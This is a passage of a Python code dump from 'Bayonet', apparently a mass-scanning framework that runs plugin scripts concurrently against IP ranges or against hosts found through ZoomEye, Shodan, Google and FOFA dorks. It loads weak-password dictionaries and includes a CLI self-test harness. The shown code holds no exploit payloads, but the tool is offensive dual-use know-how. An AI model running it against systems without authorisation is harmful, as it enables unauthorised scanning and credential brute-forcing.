| # 11 | # The above copyright notice and this permission notice shall be included in 12 | # all copies or substantial portions of the Software. 13 | # 14 | # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 15 | # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 16 | # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 17 | # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 18 | # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 19 | # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 20 | # THE SOFTWARE. 21 | # 22 | # Author: Konstantin Lepa 23 | 24 | """ANSII Color formatting for output in terminal.""" 25 | 26 | from __future__ import print_function 27 | import os 28 | 29 | 30 | __ALL__ = [ 'colored', 'cprint' ] 31 | 32 | VERSION = (1, 1, 0) 33 | 34 | ATTRIBUTES = dict( 35 | list(zip([ 36 | 'bold', 37 | 'dark', 38 | '', 39 | 'underline', 40 | 'blink', 41 | '', 42 | 'reverse', 43 | 'concealed' 44 | ], 45 | list(range(1, 9)) 46 | )) 47 | ) 48 | del ATTRIBUTES[''] 49 | 50 | 51 | HIGHLIGHTS = dict( 52 | list(zip([ 53 | 'on_grey', 54 | 'on_red', 55 | 'on_green', 56 | 'on_yellow', 57 | 'on_blue', 58 | 'on_magenta', 59 | 'on_cyan', 60 | 'on_white' 61 | ], 62 | list(range(40, 48)) 63 | )) 64 | ) 65 | 66 | 67 | COLORS = dict( 68 | list(zip([ 69 | 'grey', 70 | 'red', 71 | 'green', 72 | 'yellow', 73 | 'blue', 74 | 'magenta', 75 | 'cyan', 76 | 'white', 77 | ], 78 | list(range(30, 38)) 79 | )) 80 | ) 81 | 82 | 83 | RESET = '\033[0m' 84 | 85 | 86 | def colored(text, color=None, on_color=None, attrs=None): 87 | """Colorize text. 88 | 89 | Available text colors: 90 | red, green, yellow, blue, magenta, cyan, white. 91 | 92 | Available text highlights: 93 | on_red, on_green, on_yellow, on_blue, on_magenta, on_cyan, on_white. 94 | 95 | Available attributes: 96 | bold, dark, underline, blink, reverse, concealed. 97 | 98 | Example: 99 | colored('Hello, World!', 'red', 'on_grey', ['blue', 'blink']) 100 | colored('Hello, World!', 'green') 101 | """ 102 | if os.getenv('ANSI_COLORS_DISABLED') is None: 103 | fmt_str = '\033[%dm%s' 104 | if color is not None: 105 | text = fmt_str % (COLORS[color], text) 106 | 107 | if on_color is not None: 108 | text = fmt_str % (HIGHLIGHTS[on_color], text) 109 | 110 | if attrs is not None: 111 | for attr in attrs: 112 | text = fmt_str % (ATTRIBUTES[attr], text) 113 | 114 | text += RESET 115 | return text 116 | 117 | 118 | def cprint(text, color=None, on_color=None, attrs=None, **kwargs): 119 | """Print colorize text. 120 | 121 | It accepts arguments of print function. 122 | """ 123 | 124 | print((colored(text, color, on_color, attrs)), **kwargs) 125 | 126 | 127 | if __name__ == '__main__': 128 | print('Current terminal type: %s' % os.getenv('TERM')) 129 | print('Test basic colors:') 130 | cprint('Grey color', 'grey') 131 | cprint('Red color', 'red') 132 | cprint('Green color', 'green') 133 | cprint('Yellow color', 'yellow') 134 | cprint('Blue color', 'blue') 135 | cprint('Magenta color', 'magenta') 136 | cprint('Cyan color', 'cyan') 137 | cprint('White color', 'white') 138 | print(('-' * 78)) 139 | 140 | print('Test highlights:') 141 | cprint('On grey color', on_color='on_grey') 142 | cprint('On red color', on_color='on_red') 143 | cprint('On green color', on_color='on_green') 144 | cprint('On yellow color', on_color='on_yellow') 145 | cprint('On blue color', on_color='on_blue') 146 | cprint('On magenta color', on_color='on_magenta') 147 | cprint('On cyan color', on_color='on_cyan') 148 | cprint('On white color', color='grey', on_color='on_white') 149 | print('-' * 78) 150 | 151 | print('Test attributes:') 152 | cprint('Bold grey color', 'grey', attrs=['bold']) 153 | cprint('Dark red color', 'red', attrs=['dark']) 154 | cprint('Underline green color', 'green', attrs=['underline']) 155 | cprint('Blink yellow color', 'yellow', attrs=['blink']) 156 | cprint('Reversed blue color', 'blue', attrs=['reverse']) 157 | cprint('Concealed Magenta color', 'magenta', attrs=['concealed']) 158 | cprint('Bold underline reverse cyan color', 'cyan', 159 | attrs=['bold', 'underline', 'reverse']) 160 | cprint('Dark blink concealed white color', 'white', 161 | attrs=['dark', 'blink', 'concealed']) 162 | print(('-' * 78)) 163 | 164 | print('Test mixing:') 165 | cprint('Underline red on grey color', 'red', 'on_grey', 166 | ['underline']) 167 | cprint('Reversed green on red color', 'green', 'on_red', ['reverse']) 168 | 169 | -------------------------------------------------------------------------------- /lib/debug.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | #! *-* coding:utf8 -*- 3 | # author syst1m 4 | 5 | auto = """ 6 | 7 | # help 8 | -h;powered by syst1m <1990758989@qq.com> 9 | --help;powered by syst1m <1990758989@qq.com> 10 | 11 | # version 12 | -v;1. 13 | --version;1. 14 | 15 | # show 16 | --show;Script Name 17 | 18 | # --browser --single -iA -iN -iS -iF 19 | -s test;[-] Please load targets 20 | -s test -iA 1-10 --single;[*] [single-mode] found! 21 | -s test -iN 10.10.0/30 --browser -oF;[-] [--browser] is based on file output 22 | -s test -iS "http://test.com" --browser;[*] System exit. 23 | -s test -iF data/pass100.txt -t 50 -oF;concurrent: 50;[*] System exit. 24 | 25 | # -s 26 | -iA 1-10;Use -s to load script 27 | -s 1234567890 -iS aaa;Script [1234567890.py] not exist 28 | -s test -iS aaa;[*] System exit. 29 | -s test.py -iS aaa;[*] System exit. 30 | -s script/test.py -iS aaa;[*] System exit. 31 | -s ./ -iS aaa;[-] [./] not a file. 32 | 33 | # -eT -eC -t 34 | -eT -s test -iA 1-10 -t 5 -oF;concurrent: 5;[*] System exit. 35 | -eT -s test -iF data/pass100.txt -t 50 -oF;concurrent: 50;[*] System exit. 36 | -eT -s test -iA 1-10 -t 500 -oF;range: 1 to 100 37 | -eG -s test -iS http://sss.com -oF;[*] System exit 38 | 39 | # -oS 40 | -s test -iS aaa;by cdxy mail:i@cdxy.me };[*] System exit. 41 | -s test -iS aaa -oS;[*] System exit.$mail:i@cdxy.me } 42 | 43 | # --limit -aS -aZ -aG 44 | -s test -aS 1 --limit=0;[-] Invalid value in [--limit] 45 | -s test -aS 1 --limit=2;[+] Total: 2;[*] System exit. 46 | -s test -aZ 1 --limit=2;[+] Total: 10;[*] System exit. 47 | -s test -aZ 1 --limit=10;[+] Total: 10;[*] System exit. 48 | -s test -aZ 1 --limit=11;[+] Total: 20;[*] System exit. 49 | -s test -aG 1 --limit=2;[+] Total: 10;[*] System exit. 50 | -s test -aG 1 --limit=10;[+] Total: 10;[*] System exit. 51 | -s test -aG 1 --limit=11;[+] Total: 20;[*] System exit. 52 | -s test -aG faefafw32qtfafw3;[+] Total: 0;[*] System exit. 53 | 54 | # --offset 55 | -s test -aS 1 --offset=0;[*] System exit. 56 | -s test -aS 1 --offset=10;[*] System exit. 57 | 58 | # --search-type 59 | -s test -aZ 1 --search-type "hello";[-] Invalid value in [--search-type] 60 | -s test -aZ 1 --search-type 111;[-] Invalid value in [--search-type] 61 | -s test -aZ 1 --search-type web;[*] System exit. 62 | -s test -aZ 1 --search-type host;[*] System exit. 63 | -s test -aZ 1 --search-type web,host;[-] Invalid value in [--search-type] 64 | 65 | # --gproxy 66 | -s test -aG 1 --gproxy="http 127.0.0.1 1111";[-] Unable to connect Google 67 | -s test -aG 1 --gproxy="http 127.0.0.1";[-] SyntaxError in GoogleProxy string 68 | -s test -aG 1 --gproxy="1 127.0.0.1 1";[-] Invalid proxy-type 69 | -s test -aG 1 --gproxy="http 127.0.0.1 fa";[-] Invalid port in GoogleProxy string 70 | -s test -aG 1 --gproxy="http 127.0.0.1 1894";[*] System exit. 71 | -s test -aG 1 --gproxy="sock5 127.0.0.1 7070";[*] System exit. 72 | -s test -aG 1 --gproxy "http 127.0.0.1 23124";[-] Unable to connect Google 73 | 74 | # output 75 | -s test -iA 1-10 -o _checko.txt;[*] System exit. 76 | -s test -iA 1-10 -o _checko1.txt -oF;[-] Cannot use [-oF] and [-o] together 77 | -s test -iA 1-10 -o _checko2.txt -oS;[*] System exit. 78 | 79 | 80 | # scripts 81 | 82 | """ 83 | 84 | header = """#!/usr/bin/python3 85 | # -*- coding: utf-8 -*- 86 | # author = syst1m 87 | # author""" 88 | 89 | import os 90 | import subprocess 91 | 92 | 93 | def headerCheck(path): 94 | parents = os.listdir(path) 95 | for parent in parents: 96 | if parent == 'thirdparty': 97 | continue 98 | child = os.path.join(path, parent) 99 | if os.path.isdir(child): 100 | headerCheck(child) 101 | elif os.path.isfile(child): 102 | if child.endswith('.py'): 103 | if open(child).read().startswith(header): 104 | pass 105 | else: 106 | print('Invalid header in %s' % child) 107 | 108 | 109 | def autoCheckResult(output, error, expect, unexpect): 110 | for each in expect: 111 | if each in output or each in error: 112 | pass 113 | else: 114 | return False 115 | for each in unexpect: 116 | if each in output or each in error: 117 | return False 118 | else: 119 | pass 120 | return True 121 | 122 | 123 | def autoCheck(): 124 | base = 'python3 Bayonet.py ' 125 | for each in auto.split('\n'): 126 | if not each or each.startswith('#'): 127 | continue 128 | u = each.split('$')[1:] 129 | each = each.split('$')[0] 130 | c = each.split(';')[0] 131 | r = each.split(';')[1:] 132 | 133 | command = base + c 134 | process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True) 135 | o = process.stdout.read() 136 | e = process.stderr.read() 137 | if autoCheckResult(o, e, r, u): 138 | pass 139 | else: 140 | print(command) 141 | 142 | 143 | def checkInvalidVersion(): 144 | command = 'python3 Bayonet.py -h' 145 | process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) 146 | o = process.stdout.read() 147 | e = process.stderr.read() 148 | if autoCheckResult(o, e, ['[CRITICAL] incompatible Python version'], []): 149 | pass 150 | else: 151 | print(command) 152 | 153 | 154 | def checkOutput(base_path): 155 | target1 = os.path.join(base_path, '_checko.txt') 156 | target2 = os.path.join(base_path, '_checko1.txt') 157 | target3 = os.path.join(base_path, '_checko2.txt') 158 | try: 159 | if len(open(target1).read()) and not os.path.isfile(target2) and len(open(target3).read()): 160 | os.remove(target1) 161 | os.remove(target3) 162 | else: 163 | print('!!!failed!!!') 164 | except IOError: 165 | print('!!!failed!!!') 166 | 167 | 168 | def debugMain(): 169 | try: 170 | root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) 171 | os.chdir(root_dir) 172 | print('>>> base-dir [%s]' % root_dir) 173 | 174 | print('>>> start header check') 175 | headerCheck(root_dir) 176 | 177 | print('>>> start invalid-version check') 178 | checkInvalidVersion() 179 | 180 | print('>>> start command check') 181 | autoCheck() 182 | 183 | print('>>> start output check') 184 | checkOutput(root_dir) 185 | 186 | except KeyboardInterrupt: 187 | exit('User quit!') 188 | return 189 | 190 | 191 | if __name__ == '__main__': 192 | debugMain() 193 | -------------------------------------------------------------------------------- /thirdparty/colorama/ansitowin32.py: -------------------------------------------------------------------------------- 1 | 2 | import re 3 | import sys 4 | 5 | from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style 6 | from .winterm import WinTerm, WinColor, WinStyle 7 | from .win32 import windll 8 | 9 | 10 | if windll is not None: 11 | winterm = WinTerm() 12 | 13 | 14 | def is_a_tty(stream): 15 | return hasattr(stream, 'isatty') and stream.isatty() 16 | 17 | 18 | class StreamWrapper(object): 19 | ''' 20 | Wraps a stream (such as stdout), acting as a transparent proxy for all 21 | attribute access apart from method 'write()', which is delegated to our 22 | Converter instance. 23 | ''' 24 | def __init__(self, wrapped, converter): 25 | # double-underscore everything to prevent clashes with names of 26 | # attributes on the wrapped stream object. 27 | self.__wrapped = wrapped 28 | self.__convertor = converter 29 | 30 | def __getattr__(self, name): 31 | return getattr(self.__wrapped, name) 32 | 33 | def write(self, text): 34 | self.__convertor.write(text) 35 | 36 | 37 | class AnsiToWin32(object): 38 | ''' 39 | Implements a 'write()' method which, on Windows, will strip ANSI character 40 | sequences from the text, and if outputting to a tty, will convert them into 41 | win32 function calls. 42 | ''' 43 | ANSI_RE = re.compile('\033\[((?:\d|;)*)([a-zA-Z])') 44 | 45 | def __init__(self, wrapped, convert=None, strip=None, autoreset=False): 46 | # The wrapped stream (normally sys.stdout or sys.stderr) 47 | self.wrapped = wrapped 48 | 49 | # should we reset colors to defaults after every .write() 50 | self.autoreset = autoreset 51 | 52 | # create the proxy wrapping our output stream 53 | self.stream = StreamWrapper(wrapped, self) 54 | 55 | on_windows = sys.platform.startswith('win') 56 | 57 | # should we strip ANSI sequences from our output? 58 | if strip is None: 59 | strip = on_windows 60 | self.strip = strip 61 | 62 | # should we should convert ANSI sequences into win32 calls? 63 | if convert is None: 64 | convert = on_windows and is_a_tty(wrapped) 65 | self.convert = convert 66 | 67 | # dict of ansi codes to win32 functions and parameters 68 | self.win32_calls = self.get_win32_calls() 69 | 70 | # are we wrapping stderr? 71 | self.on_stderr = self.wrapped is sys.stderr 72 | 73 | 74 | def should_wrap(self): 75 | ''' 76 | True if this class is actually needed. If false, then the output 77 | stream will not be affected, nor will win32 calls be issued, so 78 | wrapping stdout is not actually required. This will generally be 79 | False on non-Windows platforms, unless optional functionality like 80 | autoreset has been requested using kwargs to init() 81 | ''' 82 | return self.convert or self.strip or self.autoreset 83 | 84 | 85 | def get_win32_calls(self): 86 | if self.convert and winterm: 87 | return { 88 | AnsiStyle.RESET_ALL: (winterm.reset_all, ), 89 | AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT), 90 | AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL), 91 | AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL), 92 | AnsiFore.BLACK: (winterm.fore, WinColor.BLACK), 93 | AnsiFore.RED: (winterm.fore, WinColor.RED), 94 | AnsiFore.GREEN: (winterm.fore, WinColor.GREEN), 95 | AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW), 96 | AnsiFore.BLUE: (winterm.fore, WinColor.BLUE), 97 | AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA), 98 | AnsiFore.CYAN: (winterm.fore, WinColor.CYAN), 99 | AnsiFore.WHITE: (winterm.fore, WinColor.GREY), 100 | AnsiFore.RESET: (winterm.fore, ), 101 | AnsiBack.BLACK: (winterm.back, WinColor.BLACK), 102 | AnsiBack.RED: (winterm.back, WinColor.RED), 103 | AnsiBack.GREEN: (winterm.back, WinColor.GREEN), 104 | AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW), 105 | AnsiBack.BLUE: (winterm.back, WinColor.BLUE), 106 | AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA), 107 | AnsiBack.CYAN: (winterm.back, WinColor.CYAN), 108 | AnsiBack.WHITE: (winterm.back, WinColor.GREY), 109 | AnsiBack.RESET: (winterm.back, ), 110 | } 111 | 112 | 113 | def write(self, text): 114 | if self.strip or self.convert: 115 | self.write_and_convert(text) 116 | else: 117 | self.wrapped.write(text) 118 | self.wrapped.flush() 119 | if self.autoreset: 120 | self.reset_all() 121 | 122 | 123 | def reset_all(self): 124 | if self.convert: 125 | self.call_win32('m', (0,)) 126 | elif is_a_tty(self.wrapped): 127 | self.wrapped.write(Style.RESET_ALL) 128 | 129 | 130 | def write_and_convert(self, text): 131 | ''' 132 | Write the given text to our wrapped stream, stripping any ANSI 133 | sequences from the text, and optionally converting them into win32 134 | calls. 135 | ''' 136 | cursor = 0 137 | for match in self.ANSI_RE.finditer(text): 138 | start, end = match.span() 139 | self.write_plain_text(text, cursor, start) 140 | self.convert_ansi(*match.groups()) 141 | cursor = end 142 | self.write_plain_text(text, cursor, len(text)) 143 | 144 | 145 | def write_plain_text(self, text, start, end): 146 | if start < end: 147 | self.wrapped.write(text[start:end]) 148 | self.wrapped.flush() 149 | 150 | 151 | def convert_ansi(self, paramstring, command): 152 | if self.convert: 153 | params = self.extract_params(paramstring) 154 | self.call_win32(command, params) 155 | 156 | 157 | def extract_params(self, paramstring): 158 | def split(paramstring): 159 | for p in paramstring.split(';'): 160 | if p != '': 161 | yield int(p) 162 | return tuple(split(paramstring)) 163 | 164 | 165 | def call_win32(self, command, params): 166 | if params == []: 167 | params = [0] 168 | if command == 'm': 169 | for param in params: 170 | if param in self.win32_calls: 171 | func_args = self.win32_calls[param] 172 | func = func_args[0] 173 | args = func_args[1:] 174 | kwargs = dict(on_stderr=self.on_stderr) 175 | func(*args, **kwargs) 176 | elif command in ('H', 'f'): # set cursor position 177 | func = winterm.set_cursor_position 178 | func(params, on_stderr=self.on_stderr) 179 | elif command in ('J'): 180 | func = winterm.erase_data 181 | func(params, on_stderr=self.on_stderr) 182 | elif command == 'A': 183 | if params == () or params == None: 184 | num_rows = 1 185 | else: 186 | num_rows = params[0] 187 | func = winterm.cursor_up 188 | func(num_rows, on_stderr=self.on_stderr) 189 | 190 | -------------------------------------------------------------------------------- /lib/core/common.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | 6 | import os 7 | import re 8 | import sys 9 | import time 10 | import logging 11 | import webbrowser 12 | from lib.core.data import * 13 | from lib.core.exception import * 14 | from lib.core.log import LOGGER_HANDLER 15 | from lib.core.settings import BANNER, UNICODE_ENCODING, NULL, INVALID_UNICODE_CHAR_FORMAT 16 | from lib.core.convert import stdoutencode 17 | from lib.core.enums import EXIT_STATUS, ENGINE_MODE_STATUS 18 | from thirdparty.termcolor.termcolor import colored 19 | from thirdparty.odict.odict import OrderedDict 20 | 21 | 22 | def setPaths(): 23 | """ 24 | Sets absolute paths for project directories and files 25 | """ 26 | root_path = paths.ROOT_PATH 27 | paths.DATA_PATH = os.path.join(root_path, "data") 28 | paths.SCRIPT_PATH = os.path.join(root_path, "script") 29 | paths.OUTPUT_PATH = os.path.join(root_path, "output") 30 | paths.CONFIG_PATH = os.path.join(root_path, "toolkit.conf") 31 | if not os.path.exists(paths.SCRIPT_PATH): 32 | os.mkdir(paths.SCRIPT_PATH) 33 | if not os.path.exists(paths.OUTPUT_PATH): 34 | os.mkdir(paths.OUTPUT_PATH) 35 | if not os.path.exists(paths.DATA_PATH): 36 | os.mkdir(paths.DATA_PATH) 37 | 38 | paths.WEAK_PASS = os.path.join(paths.DATA_PATH, "pass100.txt") 39 | paths.LARGE_WEAK_PASS = os.path.join(paths.DATA_PATH, "pass1000.txt") 40 | paths.UA_LIST_PATH = os.path.join(paths.DATA_PATH, "user-agents.txt") 41 | 42 | if os.path.isfile(paths.CONFIG_PATH) and os.path.isfile(paths.WEAK_PASS) and os.path.isfile( 43 | paths.LARGE_WEAK_PASS) and os.path.isfile(paths.UA_LIST_PATH): 44 | pass 45 | else: 46 | msg = 'Some files missing, it may cause an issue.\n' 47 | msg += 'Please use \'--update\' to get the complete program from github.com.' 48 | raise ToolkitMissingPrivileges(msg) 49 | 50 | 51 | def checkFile(filename): 52 | """ 53 | function Checks for file existence and readability 54 | """ 55 | valid = True 56 | 57 | if filename is None or not os.path.isfile(filename): 58 | valid = False 59 | 60 | if valid: 61 | try: 62 | with open(filename, "rb"): 63 | pass 64 | except IOError: 65 | valid = False 66 | 67 | if not valid: 68 | raise ToolkitSystemException("unable to read file '%s'" % filename) 69 | 70 | 71 | def banner(): 72 | """ 73 | Function prints banner with its version 74 | """ 75 | _ = BANNER 76 | if not getattr(LOGGER_HANDLER, "is_tty", False): 77 | _ = re.sub("\033.+?m", "", _) 78 | dataToStdout(_) 79 | 80 | 81 | def dataToStdout(data, bold=False): 82 | """ 83 | Writes text to the stdout (console) stream 84 | """ 85 | if conf.SCREEN_OUTPUT: 86 | if conf.ENGINE is ENGINE_MODE_STATUS.THREAD: 87 | logging._acquireLock() 88 | 89 | if isinstance(data, str): 90 | message = stdoutencode(data) 91 | else: 92 | message = data 93 | 94 | sys.stdout.write(setColor(message.decode('utf8'), bold)) 95 | try: 96 | sys.stdout.flush() 97 | except IOError: 98 | pass 99 | 100 | if conf.ENGINE is ENGINE_MODE_STATUS.THREAD: 101 | logging._releaseLock() 102 | return 103 | 104 | 105 | def setColor(message, bold=False): 106 | retVal = message 107 | 108 | if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler 109 | if bold: 110 | retVal = colored(message, color=None, on_color=None, attrs=("bold",)) 111 | 112 | return retVal 113 | 114 | 115 | def pollProcess(process, suppress_errors=False): 116 | """ 117 | Checks for process status (prints > if still running) 118 | """ 119 | 120 | while True: 121 | message = '>' 122 | sys.stdout.write(message) 123 | try: 124 | sys.stdout.flush() 125 | except IOError: 126 | pass 127 | 128 | time.sleep(1) 129 | 130 | returncode = process.poll() 131 | 132 | if returncode is not None: 133 | if not suppress_errors: 134 | if returncode == 0: 135 | print(" done\n") 136 | elif returncode < 0: 137 | print(" process terminated by signal %d\n" % returncode) 138 | elif returncode > 0: 139 | print(" quit unexpectedly with return code %d\n" % returncode) 140 | break 141 | 142 | 143 | def getSafeExString(ex, encoding=None): 144 | """ 145 | Safe way how to get the proper exception represtation as a string 146 | (Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161')) 147 | """ 148 | retVal = ex 149 | 150 | if getattr(ex, "message", None): 151 | retVal = ex.message 152 | elif getattr(ex, "msg", None): 153 | retVal = ex.msg 154 | 155 | return getUnicode(retVal, encoding=encoding) 156 | 157 | 158 | def getUnicode(value, encoding=None, noneToNull=False): 159 | """ 160 | Return the unicode representation of the supplied value: 161 | >>> getUnicode(u'test') 162 | u'test' 163 | >>> getUnicode('test') 164 | u'test' 165 | >>> getUnicode(1) 166 | u'1' 167 | """ 168 | 169 | if noneToNull and value is None: 170 | return NULL 171 | 172 | if isListLike(value): 173 | value = list(getUnicode(_, encoding, noneToNull) for _ in value) 174 | return value 175 | 176 | if isinstance(value, unicode): 177 | return value 178 | elif isinstance(value, basestring): 179 | while True: 180 | try: 181 | return unicode(value, encoding or UNICODE_ENCODING) 182 | except UnicodeDecodeError as ex: 183 | try: 184 | return unicode(value, UNICODE_ENCODING) 185 | except Exception: 186 | value = value[:ex.start] + "".join( 187 | INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] 188 | else: 189 | try: 190 | return unicode(value) 191 | except UnicodeDecodeError: 192 | return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances 193 | 194 | 195 | def isListLike(value): 196 | """ 197 | Returns True if the given value is a list-like instance 198 | >>> isListLike([1, 2, 3]) 199 | True 200 | >>> isListLike(u'2') 201 | False 202 | """ 203 | 204 | return isinstance(value, (list, tuple, set)) 205 | 206 | 207 | def systemQuit(status=EXIT_STATUS.SYSETM_EXIT): 208 | if status == EXIT_STATUS.SYSETM_EXIT: 209 | logger.info('System exit.') 210 | elif status == EXIT_STATUS.USER_QUIT: 211 | logger.error('User quit!') 212 | elif status == EXIT_STATUS.ERROR_EXIT: 213 | logger.error('System exit.') 214 | else: 215 | raise ToolkitValueException('Invalid status code: %s' % str(status)) 216 | sys.exit(0) 217 | 218 | 219 | def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, unique=False): 220 | """ 221 | @function returns newline delimited items contained inside file 222 | """ 223 | 224 | retVal = list() if not unique else OrderedDict() 225 | 226 | checkFile(filename) 227 | 228 | try: 229 | with open(filename, 'r') as f: 230 | for line in (f.readlines() if unicode_ else f.xreadlines()): 231 | # xreadlines doesn't return unicode strings when codecs.open() is used 232 | if commentPrefix and line.find(commentPrefix) != -1: 233 | line = line[:line.find(commentPrefix)] 234 | 235 | line = line.strip() 236 | 237 | if not unicode_: 238 | try: 239 | line = str.encode(line) 240 | except UnicodeDecodeError: 241 | continue 242 | 243 | if line: 244 | if lowercase: 245 | line = line.lower() 246 | 247 | if unique and line in retVal: 248 | continue 249 | 250 | if unique: 251 | retVal[line] = True 252 | 253 | else: 254 | retVal.append(line) 255 | 256 | except (IOError, OSError, MemoryError) as ex: 257 | errMsg = "something went wrong while trying " 258 | errMsg += "to read the content of file '%s' ('%s')" % (filename, ex) 259 | raise ToolkitSystemException(errMsg) 260 | 261 | return retVal if not unique else retVal.keys() 262 | 263 | 264 | def openBrowser(): 265 | path = conf.OUTPUT_FILE_PATH 266 | try: 267 | webbrowser.open_new_tab(path) 268 | except Exception: 269 | errMsg = '\n[ERROR] Fail to open file with web browser: %s' % path 270 | raise ToolkitSystemException(errMsg) 271 | -------------------------------------------------------------------------------- /lib/core/option.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | 6 | import os 7 | import glob 8 | import time 9 | import sys 10 | from lib.core.data import conf, paths, th, logger 11 | from lib.core.enums import TARGET_MODE_STATUS, ENGINE_MODE_STATUS 12 | from lib.core.enums import API_MODE_NAME 13 | from lib.core.register import Register 14 | 15 | 16 | def initOptions(args): 17 | checkShow(args) 18 | EngineRegister(args) 19 | ScriptRegister(args) 20 | TargetRegister(args) 21 | ApiRegister(args) 22 | Output(args) 23 | Misc(args) 24 | 25 | 26 | def checkShow(args): 27 | show_scripts = args.show_scripts 28 | if show_scripts: 29 | module_name_list = glob.glob(os.path.join(paths.SCRIPT_PATH, '*.py')) 30 | msg = 'Script Name (total:%s)\n' % str(len(module_name_list) - 1) 31 | for each in module_name_list: 32 | _str = os.path.splitext(os.path.split(each)[1])[0] 33 | if _str not in ['__init__']: 34 | msg += ' %s\n' % _str 35 | sys.exit(logger.info(msg)) 36 | 37 | 38 | def EngineRegister(args): 39 | thread_status = args.engine_thread 40 | gevent_status = args.engine_gevent 41 | thread_num = args.thread_num 42 | 43 | def __thread(): 44 | conf.ENGINE = ENGINE_MODE_STATUS.THREAD 45 | 46 | def __gevent(): 47 | conf.ENGINE = ENGINE_MODE_STATUS.GEVENT 48 | 49 | conf.ENGINE = ENGINE_MODE_STATUS.THREAD # default choice 50 | 51 | msg = 'Use [-eT] to set Multi-Threaded mode or [-eG] to set Coroutine mode.' 52 | r = Register(mutex=True, start=0, stop=1, mutex_errmsg=msg) 53 | r.add(__thread, thread_status) 54 | r.add(__gevent, gevent_status) 55 | r.run() 56 | 57 | if 0 < thread_num < 101: 58 | th.THREADS_NUM = conf.THREADS_NUM = thread_num 59 | else: 60 | msg = 'Invalid input in [-t], range: 1 to 100' 61 | sys.exit(logger.error(msg)) 62 | 63 | 64 | def ScriptRegister(args): 65 | input_path = args.script_name 66 | 67 | # handle input: nothing 68 | if not input_path: 69 | msg = 'Use -s to load script. Example: [-s spider] or [-s ./script/spider.py]' 70 | sys.exit(logger.error(msg)) 71 | 72 | # handle input: "-s ./script/spider.py" 73 | if os.path.split(input_path)[0]: 74 | if os.path.exists(input_path): 75 | if os.path.isfile(input_path): 76 | if input_path.endswith('.py'): 77 | conf.MODULE_NAME = os.path.split(input_path)[-1] 78 | conf.MODULE_FILE_PATH = os.path.abspath(input_path) 79 | else: 80 | msg = '[%s] not a Python file. Example: [-s spider] or [-s ./script/spider.py]' % input_path 81 | sys.exit(logger.error(msg)) 82 | else: 83 | msg = '[%s] not a file. Example: [-s spider] or [-s ./script/spider.py]' % input_path 84 | sys.exit(logger.error(msg)) 85 | else: 86 | msg = '[%s] not found. Example: [-s spider] or [-s ./script/spider.py]' % input_path 87 | sys.exit(logger.error(msg)) 88 | 89 | # handle input: "-s spider" "-s spider.py" 90 | else: 91 | if not input_path.endswith('.py'): 92 | input_path += '.py' 93 | _path = os.path.abspath(os.path.join(paths.SCRIPT_PATH, input_path)) 94 | if os.path.isfile(_path): 95 | conf.MODULE_NAME = input_path 96 | conf.MODULE_FILE_PATH = os.path.abspath(_path) 97 | else: 98 | msg = 'Script [%s] not exist. Use [--show] to view all available script in ./script/' % input_path 99 | sys.exit(logger.error(msg)) 100 | 101 | 102 | def TargetRegister(args): 103 | input_file = args.target_file 104 | input_single = args.target_single 105 | input_network = args.target_network 106 | input_array = args.target_array 107 | api_zoomeye = args.zoomeye_dork 108 | api_shodan = args.shodan_dork 109 | api_google = args.google_dork 110 | api_fofa = args.fofa_dork 111 | 112 | def __file(): 113 | if not os.path.isfile(input_file): 114 | msg = 'TargetFile not found: %s' % input_file 115 | sys.exit(logger.error(msg)) 116 | conf.TARGET_MODE = TARGET_MODE_STATUS.FILE 117 | conf.INPUT_FILE_PATH = input_file 118 | 119 | def __array(): 120 | help_str = "Invalid input in [-iA], Example: -iA 1-100" 121 | try: 122 | _int = input_array.strip().split('-') 123 | if int(_int[0]) < int(_int[1]): 124 | if int(_int[1]) - int(_int[0]) > 1000000: 125 | warnMsg = "Loading %d targets, Maybe it's too much, continue? [y/N]" % ( 126 | int(_int[1]) - int(_int[0])) 127 | logger.warning(warnMsg) 128 | a = raw_input() 129 | if a in ('Y', 'y', 'yes'): 130 | pass 131 | else: 132 | msg = 'User quit!' 133 | sys.exit(logger.error(msg)) 134 | else: 135 | sys.exit(logger.error(help_str)) 136 | except Exception: 137 | sys.exit(logger.error(help_str)) 138 | conf.TARGET_MODE = TARGET_MODE_STATUS.RANGE 139 | conf.I_NUM2 = input_array 140 | conf.INPUT_FILE_PATH = None 141 | 142 | def __network(): 143 | conf.TARGET_MODE = TARGET_MODE_STATUS.IPMASK 144 | conf.NETWORK_STR = input_network 145 | conf.INPUT_FILE_PATH = None 146 | 147 | def __single(): 148 | conf.TARGET_MODE = TARGET_MODE_STATUS.SINGLE 149 | conf.SINGLE_TARGET_STR = input_single 150 | th.THREADS_NUM = conf.THREADS_NUM = 1 151 | conf.INPUT_FILE_PATH = None 152 | 153 | def 